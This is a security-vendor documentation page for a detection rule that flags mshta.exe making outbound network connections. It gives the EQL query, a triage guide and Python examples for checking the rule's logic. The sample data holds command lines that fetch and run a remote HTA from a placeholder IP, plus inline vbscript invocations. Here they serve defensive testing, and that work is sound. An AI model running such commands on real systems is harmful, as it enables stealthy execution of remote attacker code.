Mshta Making Network Connections
Identifies Mshta.exe making outbound network connections. This may indicate adversarial activity, as Mshta is often leveraged by adversaries to execute malicious scripts and evade detection.
Elastic rule

```toml
[metadata]
creation_date = "2020/09/02"
integration = ["endpoint", "windows"]
maturity = "production"
updated_date = "2025/01/15"
min_stack_version = "8.14.0"
min_stack_comments = "Breaking change at 8.14.0 for the Windows Integration."

[rule]
author = ["Elastic"]
description = """
Identifies Mshta.exe making outbound network connections. This may indicate adversarial activity, as Mshta is often
leveraged by adversaries to execute malicious scripts and evade detection.
"""
from = "now-20m"
index = [
  "logs-endpoint.events.process-*",
  "logs-endpoint.events.network-*",
  "winlogbeat-*",
  "logs-windows.sysmon_operational-*",
]
language = "eql"
license = "Elastic License v2"
name = "Mshta Making Network Connections"
references = [
  "https://www.elastic.co/security-labs/elastic-protects-against-data-wiper-malware-targeting-ukraine-hermeticwiper",
]
risk_score = 47
rule_id = "c2d90150-0133-451c-a783-533e736c12d7"
severity = "medium"
tags = [
  "Domain: Endpoint",
  "OS: Windows",
  "Use Case: Threat Detection",
  "Tactic: Defense Evasion",
  "Data Source: Elastic Defend",
  "Data Source: Sysmon",
  "Resources: Investigation Guide",
]
type = "eql"

query = '''
sequence by process.entity_id with maxspan=10m
  [process where host.os.type == "windows" and event.type == "start" and process.name : "mshta.exe" and
     not process.parent.name : "Microsoft.ConfigurationManagement.exe" and
     not (process.parent.executable : "C:\\Amazon\\Amazon Assistant\\amazonAssistantService.exe" or
          process.parent.executable : "C:\\TeamViewer\\TeamViewer.exe") and
     not process.args : "ADSelfService_Enroll.hta"]
  [network where host.os.type == "windows" and process.name : "mshta.exe"]
'''
note = """## Triage and analysis

> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.

### Investigating Mshta Making Network Connections

Mshta.exe is a legitimate Windows utility used to execute Microsoft HTML Application (HTA) files. Adversaries exploit it to run malicious scripts, leveraging its trusted status to bypass security measures. The detection rule identifies suspicious network activity by Mshta.exe, excluding known benign processes, to flag potential threats. This approach helps in identifying unauthorized network connections indicative of malicious intent.

### Possible investigation steps

- Review the process tree to understand the parent-child relationship of mshta.exe, focusing on any unusual or unexpected parent processes that are not excluded by the rule, such as Microsoft.ConfigurationManagement.exe or known benign executables.
- Analyze the command-line arguments used by mshta.exe to identify any suspicious or unexpected scripts being executed, especially those not matching the excluded ADSelfService_Enroll.hta.
- Examine the network connections initiated by mshta.exe, including destination IP addresses, domains, and ports, to identify any connections to known malicious or suspicious endpoints.
- Check for any related alerts or logs from the same host around the time of the mshta.exe activity to identify potential lateral movement or additional malicious behavior.
- Investigate the user account associated with the mshta.exe process to determine if it has been compromised or is exhibiting unusual activity patterns.

### False positive analysis

- Mshta.exe may be triggered by legitimate software updates or installations, such as those from Microsoft Configuration Management. To handle this, add exceptions for processes with parent names like Microsoft.ConfigurationManagement.exe.
- Certain applications like Amazon Assistant and TeamViewer may use Mshta.exe for legitimate purposes. Exclude these by specifying their executable paths, such as C:\\Amazon\\Amazon Assistant\\amazonAssistantService.exe and C:\\TeamViewer\\TeamViewer.exe.
- Custom scripts or internal tools that utilize HTA files for automation might cause false positives. Identify these scripts and exclude them by their specific arguments, such as ADSelfService_Enroll.hta.
- Regularly review and update the list of exceptions to ensure that only verified benign activities are excluded, minimizing the risk of overlooking genuine threats.

### Response and remediation

- Isolate the affected system from the network to prevent further unauthorized access or data exfiltration.
- Terminate the mshta.exe process if it is confirmed to be making unauthorized network connections.
- Conduct a thorough scan of the affected system using updated antivirus and anti-malware tools to identify and remove any malicious scripts or files.
- Review and analyze the process tree and network connections associated with mshta.exe to identify any additional compromised processes or systems.
- Restore the system from a known good backup if malicious activity is confirmed and cannot be fully remediated.
- Implement application whitelisting to prevent unauthorized execution of mshta.exe and similar system binaries.
- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to assess the potential impact on the broader network."""


[[rule.threat]]
framework = "MITRE ATT&CK"
[[rule.threat.technique]]
id = "T1218"
name = "System Binary Proxy Execution"
reference = "https://attack.mitre.org/techniques/T1218/"
[[rule.threat.technique.subtechnique]]
id = "T1218.005"
name = "Mshta"
reference = "https://attack.mitre.org/techniques/T1218/005/"



[rule.threat.tactic]
id = "TA0005"
name = "Defense Evasion"
reference = "https://attack.mitre.org/tactics/TA0005/"
```
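The EQL sequence above re-implemented in plain Python and run over constructed ECS-shaped events, as an added example (it is not Elastic's code and not part of the rule). It shows the join on process.entity_id, the 10-minute maxspan, and a tuning point worth knowing: the `process.args : "ADSelfService_Enroll.hta"` exclusion matches one whole argument, so the same file passed with a path still alerts. Hosts, entity IDs, paths and addresses in the sample data are hypothetical.

```python
"""Plain-Python re-implementation of the rule's EQL sequence, run over constructed
ECS-shaped events. Sample data only (hypothetical IDs, paths and addresses), not Elastic's code."""
from datetime import datetime, timedelta

MAXSPAN = timedelta(minutes=10)  # sequence ... with maxspan=10m

# Exclusions copied from the rule. EQL ':' compares case-insensitively, so both sides are lower-cased.
EXCLUDED_PARENT_NAMES = {"microsoft.configurationmanagement.exe"}
EXCLUDED_PARENT_EXECUTABLES = {r"c:\amazon\amazon assistant\amazonassistantservice.exe",
                               r"c:\teamviewer\teamviewer.exe"}
EXCLUDED_ARGS = {"adselfservice_enroll.hta"}  # matches one whole argument, not a substring of a path


def field(event, path, default=""):
    """Fetch a dotted ECS field such as 'process.parent.name' from a nested dict."""
    cur = event
    for key in path.split("."):
        if not isinstance(cur, dict) or key not in cur:
            return default
        cur = cur[key]
    return cur


def is_mshta_start(e):
    """Step 1: mshta.exe process start on Windows that no exclusion covers."""
    if (field(e, "host.os.type"), field(e, "event.category"), field(e, "event.type")) != ("windows", "process", "start"):
        return False
    if field(e, "process.name").lower() != "mshta.exe":
        return False
    excluded = (field(e, "process.parent.name").lower() in EXCLUDED_PARENT_NAMES
                or field(e, "process.parent.executable").lower() in EXCLUDED_PARENT_EXECUTABLES
                or any(a.lower() in EXCLUDED_ARGS for a in field(e, "process.args", [])))
    return not excluded


def is_mshta_network(e):
    """Step 2: any network event attributed to mshta.exe on Windows."""
    return (field(e, "host.os.type") == "windows" and field(e, "event.category") == "network"
            and field(e, "process.name").lower() == "mshta.exe")


def run_sequence(events):
    """Join step 1 and step 2 on process.entity_id; step 2 must follow within MAXSPAN.
    Simplified EQL state machine: one pending start per entity_id, at most one match per start."""
    pending, matches = {}, []
    for ev in sorted(events, key=lambda x: x["@timestamp"]):
        eid = field(ev, "process.entity_id")
        if is_mshta_start(ev):
            pending[eid] = ev
        elif is_mshta_network(ev) and eid in pending:
            start_ev = pending.pop(eid)
            if ev["@timestamp"] - start_ev["@timestamp"] <= MAXSPAN:
                matches.append((start_ev, ev))
    return matches


# ---- constructed sample events (hypothetical) ----
T0 = datetime(2025, 1, 15, 9, 0, 0)
EXPLORER = r"C:\Windows\explorer.exe"

def start(eid, at, parent_name, parent_exe, args):
    return {"@timestamp": at, "host": {"os": {"type": "windows"}}, "event": {"category": "process", "type": "start"},
            "process": {"name": "mshta.exe", "entity_id": eid, "args": args,
                        "parent": {"name": parent_name, "executable": parent_exe}}}

def network(eid, at, dest_ip):
    return {"@timestamp": at, "host": {"os": {"type": "windows"}}, "event": {"category": "network"},
            "process": {"name": "mshta.exe", "entity_id": eid}, "destination": {"ip": dest_ip}}

SAMPLE_EVENTS = [
    # A: remote HTA launched from Explorer, connection 20 s later -> alerts
    start("A", T0, "explorer.exe", EXPLORER, ["mshta.exe", "http://198.51.100.7/update.hta"]),
    network("A", T0 + timedelta(seconds=20), "198.51.100.7"),
    # B: spawned by the ConfigMgr client -> excluded by parent name
    start("B", T0, "Microsoft.ConfigurationManagement.exe", r"C:\Windows\CCM\Microsoft.ConfigurationManagement.exe",
          ["mshta.exe", r"C:\Windows\CCM\notify.hta"]),
    network("B", T0 + timedelta(seconds=5), "10.0.0.12"),
    # C: the ADSelfService enrollment HTA passed as a bare argument -> excluded
    start("C", T0, "explorer.exe", EXPLORER, ["mshta.exe", "ADSelfService_Enroll.hta"]),
    network("C", T0 + timedelta(seconds=3), "10.0.0.40"),
    # D: same as A, but the connection comes 11 min later -> outside maxspan, no alert
    start("D", T0, "explorer.exe", EXPLORER, ["mshta.exe", "http://203.0.113.9/x.hta"]),
    network("D", T0 + timedelta(minutes=11), "203.0.113.9"),
    # E: TeamViewer at its default install path -> excluded by parent executable
    start("E", T0, "TeamViewer.exe", r"C:\TeamViewer\TeamViewer.exe", ["mshta.exe", r"C:\TeamViewer\help.hta"]),
    network("E", T0 + timedelta(seconds=2), "10.0.0.50"),
    # F: the excluded file name, but path-qualified -> exact-argument exclusion does not apply, alerts
    start("F", T0, "explorer.exe", EXPLORER, ["mshta.exe", r"C:\IT\ADSelfService_Enroll.hta"]),
    network("F", T0 + timedelta(seconds=4), "10.0.0.40"),
]


def matched_entity_ids(events=SAMPLE_EVENTS):
    """Entity IDs the rule would alert on, in the order their network event completed the sequence."""
    return [field(s, "process.entity_id") for s, _ in run_sequence(events)]
```

Only A and F survive: B, C and E are dropped by the three exclusions, and D's connection lands outside the 10-minute window. If ADSelfService is launched with a full path in your environment, the exclusion as written will not suppress it; extend it with a wildcard pattern or a parent-executable condition rather than loosening the network step.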
Triage and analysis
Disclaimer: This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
Investigating Mshta Making Network Connections
Mshta.exe is a legitimate Windows utility that executes Microsoft HTML Application (HTA) files; it also accepts a URL, or inline script passed through the javascript: and vbscript: protocol handlers. Adversaries abuse it as a script proxy because it is a Microsoft-signed binary shipped in System32 that application control policies commonly allow, so malicious logic can run without dropping a foreign executable. The rule correlates an mshta.exe process start with a network connection from the same process (joined on process.entity_id) within ten minutes, after excluding the known benign parent processes and the ADSelfService_Enroll.hta argument listed in the query. An mshta.exe instance that reaches the network outside those exceptions is a strong indication that it is fetching a remote HTA or calling back to an attacker-controlled host.
Possible investigation steps
- Review the process tree to identify the parent of mshta.exe. The rule already excludes Microsoft.ConfigurationManagement.exe, Amazon Assistant and TeamViewer; any other parent, and in particular an Office application, browser, mail client or another script interpreter, points to a phishing or living-off-the-land chain.
- Analyze the command line. mshta.exe accepts a local file path, a URL, or inline script via javascript:/vbscript:, and it does not require the .hta extension, so a .txt or .jpg target is not reassuring. Treat anything other than a known internal HTA such as the excluded ADSelfService_Enroll.hta as unexplained until verified.
- Examine the network connections initiated by mshta.exe, including destination IP addresses, domains, and ports, and correlate them with DNS and proxy logs to identify connections to known malicious or otherwise unexpected endpoints.
- Check for any related alerts or logs from the same host around the time of the mshta.exe activity to identify potential lateral movement or additional malicious behavior.
- Investigate the user account associated with the mshta.exe process to determine if it has been compromised or is exhibiting unusual activity patterns.
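A first-pass triage of the mshta.exe command lines recovered from the process events, as an added example; the classification heuristics and the sample command lines are constructed for this page and are not Elastic's. It sorts each invocation into remote URL, inline script, UNC path, local file or the rule's own exclusion, and records why a local file still deserves a look (non-.hta extension, user-writable staging directory, or the excluded file name reached through a path that the exact-argument exclusion does not cover).

```python
"""First-pass triage of mshta.exe command lines from process events.
Heuristics and sample command lines are constructed for this example; they are not Elastic's."""
import ntpath
import re

RULE_EXCLUDED_ARGS = {"adselfservice_enroll.hta"}  # the rule excludes this exact, bare argument only
SCRIPT_SCHEMES = ("javascript:", "vbscript:")      # inline script via protocol handler, no file on disk
REMOTE_SCHEMES = ("http://", "https://")
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")
_TOKEN = re.compile(r'"([^"]*)"|(\S+)')


def split_cmdline(cmdline):
    """Minimal Windows command-line splitter: double-quoted strings or whitespace-delimited tokens."""
    return [quoted or bare for quoted, bare in _TOKEN.findall(cmdline)]


def triage_mshta(cmdline):
    """Classify what mshta.exe was asked to run and list the reasons it deserves attention."""
    args = split_cmdline(cmdline)[1:]  # token 0 is mshta.exe itself
    result = {"target": args[0] if args else None, "kind": "none", "reasons": [], "suspicious": False}
    if not args:
        result["reasons"].append("no target on the command line; inspect how the process was activated")
        return result
    target = args[0]
    low = target.lower()
    if low.startswith(SCRIPT_SCHEMES):
        result["kind"] = "inline-script"
        result["reasons"].append("script supplied inline; nothing to recover from disk, preserve the command line")
    elif low.startswith(REMOTE_SCHEMES):
        result["kind"] = "remote-url"
        result["reasons"].append("HTA fetched over the network; pivot on the host in DNS and proxy telemetry")
    elif low.startswith("\\\\"):
        result["kind"] = "unc-path"
        result["reasons"].append("HTA loaded from a network share; check who can write to it")
    elif low in RULE_EXCLUDED_ARGS:
        result["kind"] = "excluded-by-rule"  # the only shape the rule's process.args exclusion matches
    else:
        result["kind"] = "local-file"
        base = ntpath.basename(low)
        if base in RULE_EXCLUDED_ARGS:
            result["reasons"].append("same file name as the rule's exclusion, but path-qualified, so the exclusion did not match")
        if not base.endswith(".hta"):
            result["reasons"].append("mshta does not require the .hta extension; a non-.hta target is a common disguise")
        if any(p in low for p in USER_WRITABLE):
            result["reasons"].append("HTA staged in a user-writable location")
    result["suspicious"] = bool(result["reasons"])
    return result


# Constructed sample command lines (hypothetical hosts, users and paths).
SAMPLE_CMDLINES = [
    r"mshta.exe http://198.51.100.7/update.hta",
    r'mshta.exe vbscript:MsgBox("hi"):close',
    r'"C:\Windows\System32\mshta.exe" "C:\Users\alice\AppData\Local\Temp\invoice.txt"',
    r"mshta.exe ADSelfService_Enroll.hta",
    r'mshta.exe "C:\IT\ADSelfService_Enroll.hta"',
    r"mshta.exe \\fileserver\share\onboarding.hta",
]


def triage_all(cmdlines=SAMPLE_CMDLINES):
    """Map each command line to its classification, for a quick table during triage."""
    return {c: triage_mshta(c)["kind"] for c in cmdlines}


if __name__ == "__main__":
    for cmd in SAMPLE_CMDLINES:
        r = triage_mshta(cmd)
        print(f'{r["kind"]:17} suspicious={r["suspicious"]!s:5} {cmd}')
        for reason in r["reasons"]:
            print("    -", reason)
```

The splitter is deliberately minimal (it handles double quotes and whitespace, not every cmd.exe escaping rule); for production use take `process.args` from the event instead of re-splitting `process.command_line`. Note the asymmetry between samples 4 and 5: only the bare argument is covered by the rule's exclusion, which is exactly why the path-qualified variant would have alerted.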
False positive analysis
- Mshta.exe may be triggered by legitimate software updates or installations, such as those from Microsoft Configuration Management. To handle this, add exceptions for processes with parent names like Microsoft.ConfigurationManagement.exe.
- Certain applications like Amazon Assistant and TeamViewer may use Mshta.exe for legitimate purposes. Exclude these by specifying their executable paths, such as C:\Amazon\Amazon Assistant\amazonAssistantService.exe and C:\TeamViewer\TeamViewer.exe.
- Custom scripts or internal tools that utilize HTA files for automation might cause false positives. Identify these scripts and exclude them by their specific arguments, such as ADSelfService_Enroll.hta. Note that the rule's process.args exclusion matches an exact argument, so the same HTA invoked with a full path still alerts; widen the pattern deliberately rather than excluding mshta.exe wholesale.
- Regularly review and update the list of exceptions to ensure that only verified benign activities are excluded, minimizing the risk of overlooking genuine threats.
Response and remediation
- Isolate the affected system from the network to prevent further unauthorized access or data exfiltration.
- Terminate the mshta.exe process if it is confirmed to be making unauthorized network connections.
- Conduct a thorough scan of the affected system using updated antivirus and anti-malware tools to identify and remove any malicious scripts or files.
- Review and analyze the process tree and network connections associated with mshta.exe to identify any additional compromised processes or systems.
- Restore the system from a known good backup if malicious activity is confirmed and cannot be fully remediated.
- Implement application control (for example AppLocker or Windows Defender Application Control rules) to block mshta.exe and similar system binaries on hosts that have no business need for them.
- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to assess the potential impact on the broader network.
References
- https://www.elastic.co/security-labs/elastic-protects-against-data-wiper-malware-targeting-ukraine-hermeticwiper
Related rules
- Alternate Data Stream Creation/Execution at Volume Root Directory
- Command Shell Activity Started via RunDLL32
- DNS Global Query Block List Modified or Disabled
- DNS-over-HTTPS Enabled via Registry
- Encoded Executable Stored in the Registry